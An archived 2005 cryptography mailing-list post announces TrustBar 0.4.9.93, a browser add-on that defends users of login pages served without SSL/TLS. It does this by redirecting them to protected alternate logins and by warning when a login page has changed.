[18510] in cryptography@c2.net mail archive
Defending users of unprotected login pages with TrustBar 0.4.9.93
daemon@ATHENA.MIT.EDU (Amir Herzberg)
Mon Sep 19 11:07:21 2005
X-Original-To: cryptography@metzdowd.com
X-Original-To: cryptography@metzdowd.com
Date: Mon, 19 Sep 2005 14:54:14 +0200
From: Amir Herzberg <herzbea@macs.biu.ac.il>
Reply-To: herzbea@macs.biu.ac.il
To: cryptography@metzdowd.com
Most financial and other sensitive web sites use SSL/TLS to authenticate
the server and protect data from eavesdropping and from modification by
a Man In The Middle (MITM) adversary.
However, quite a few of these sites invoke SSL/TLS only _after_ user has
typed in her user name and pw, and clicked `submit`. This allows a MITM
adversary to send a modified login page to the user, which sends the pw
to the attacker (rather than encrypting it and sending to the site). See
below link to a `Hall of Shame (HoS)` listing such sites.
There are few things we can do about this. We can try to convince these
sites to use SSL/TLS _before_ asking for userid and pw; I tried, and few
fixed, but most did not. We can avoid using these sites, but this is a
bit heavy penalty e.g. if it is your bank. We can also try to find an
alternate login page which _is_ protected; in fact, we've found such
alternate, protected sites for most ebanking login sites (see HoS). But
this may be difficult for most (naive) users.
So, we decided to add support for users of these unprotected sites in
TrustBar. As of the latest version (0.4.9.93), available off my site
(below), we added two such mechanisms:
1. TrustBar will automatically download from our own server,
periodically, a list of all of the unprotected login sites, including
any alternate protected login pages we are aware of. By default,
whenever a user accesses one of these unprotected pages, she will be
automatically redirected to the alternate, protected login page.
2. TrustBar allows users to assign a name or a logo to sites, protected
or not (to help users identify fake sites). We now added a mechanism
computes a hash of every unprotected site for which the user has
assigned name/logo. TrustBar compares this hash on subsequent accesses
to the same site. If the site is not modified in five subsequent
accesses, TrustBar begins displaying `Same since <date>`; and when the
site changes, TrustBar displays a warning. This can help users notice a
fake version of their login page. Unfortunately, this mechanism does not
work very well on most real-life login pages, since most of them contain
a tiny bit of frequently-changing data such as date or `random`
identifiers (mostly to identify a cookie-less client, we think). We are
working on improving the mechanism so it will be tolerant to such tiny
changes, without exposing the user to malicious changes.
Please try it and tell us what you think of TrustBar in general and
these features specifically. If you like it, please inform others, to
protect them, help convince browsers to incorporate such features, and -
last but not least for us - help us obtain more experimental data in our
research on secure usability. Thanks!
BTW, TrustBar is an open-source project, so if some of you want to
provide it to your customers, possibly customized (branded) etc., there
is no licensing required.
--
Best regards,
Amir Herzberg
Associate Professor
Department of Computer Science
Bar Ilan University
http://AmirHerzberg.com
Try TrustBar - improved browser security UI:
http://AmirHerzberg.com/TrustBar
Visit my Hall Of Shame of Unprotected Login pages:
http://AmirHerzberg.com/shame
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com